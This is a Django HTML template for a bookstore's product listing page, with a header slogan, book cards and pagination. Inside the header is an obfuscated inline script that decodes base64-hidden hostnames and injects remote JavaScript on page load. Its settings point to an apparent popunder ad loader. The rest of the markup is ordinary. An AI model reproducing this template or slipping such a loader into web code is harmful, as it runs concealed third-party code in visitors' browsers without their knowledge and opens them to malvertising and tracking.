{% extends "base.html" %}
{% block content %}

<!-- Header -->
<header class="py-1">
    <div class="col-12">
        <div class="text-center display-4 fw-bolder gradient-text">
            <h1 class="display-4 fw-bolder">Pick Up Your Favorite Books Here.</h1>
            <p class="lead fw-normal text-dark-50 mb-0">Reading books will make you a knowledgeable person.</p>
        </div>
        <script type="text/javascript" data-cfasync="false">
            /*<![CDATA[/* */
            (function(){var v=window,z="a7b52e1519b4cc079a8df76d2f741669",b=[["siteId",674-306*838+223*347+5342197],["minBid",0],["popundersPerIP","0"],["delayBetween",0],["default",false],["defaultPerDay",0],["topmostLayer","auto"]],c=["d3d3LmRpc3BsYXl2ZXJ0aXNpbmcuY29tL0lIaGJZSy9qRVZ6ei9hY2x1c3Rlcml6ZS5taW4uanM=","ZDNtem9rdHk5NTFjNXcuY2xvdWRmcm9udC5uZXQvc2lkZXZpY2UubWluLmpz"],e=-1,g,q,a=function(){clearTimeout(q);e++;if(c[e]&&!(1761924722000<(new Date).getTime()&&1<e)){g=v.document.createElement("script");g.type="text/javascript";g.async=!0;var o=v.document.getElementsByTagName("script")[0];g.src="https://"+atob(c[e]);g.crossOrigin="anonymous";g.onerror=a;g.onload=function(){clearTimeout(q);v[z.slice(0,16)+z.slice(0,16)]||a()};q=setTimeout(a,5E3);o.parentNode.insertBefore(g,o)}};if(!v[z]){try{Object.freeze(v[z]=b)}catch(e){}a()}})();
            /*]]>/* */
        </script>
            
    </div>
</header>
<br>
<!-- Products Section -->
<section class="py-1">
    <div class="container px-4 px-lg-5 mt-5">
        <div class="row gx-3 row-cols-1 row-cols-sm-2 row-cols-md-2 row-cols-lg-3 justify-content-center">
            {% for product in products %}
            <div class="col mb-3">
                <div class="card h-100 shadow-lg">
                    <!-- Product Image -->
                    <img class="card-img-top" src="{{ product.image.url }}" alt="{{ product.name }}">
                    <!-- Product Details -->
                    <div class="card-body py-2">
                        <div class="text-center">
                            <!-- Product Name -->
                            <h class="fw-bolder gradient-text" style="color:rgb(72, 143, 248); font-size: 1.25rem;">
                                {{ product.name }}
                            </h>
                            {% if product.author %}
                                <p class="text-muted" style="color:rgb(72, 138, 236);">
                                    by 
                                    <br>{{ product.author }}
                                </p>
                            {% endif %}
                        </div>
                    </div>
                    <!-- Product Actions -->
                    <div class="card-footer py-3 border-top-1 bg-transparent">
                        <div class="text-center">
                            <a class="btn btn-outline-primary" href="{% url 'product' product.id %}">View Detail</a>
                        </div>
                    </div>
                </div>
            </div>
            {% endfor %}
        </div>
    </div>

    {% include "pagination.html" %}
</section>

{% endblock %}

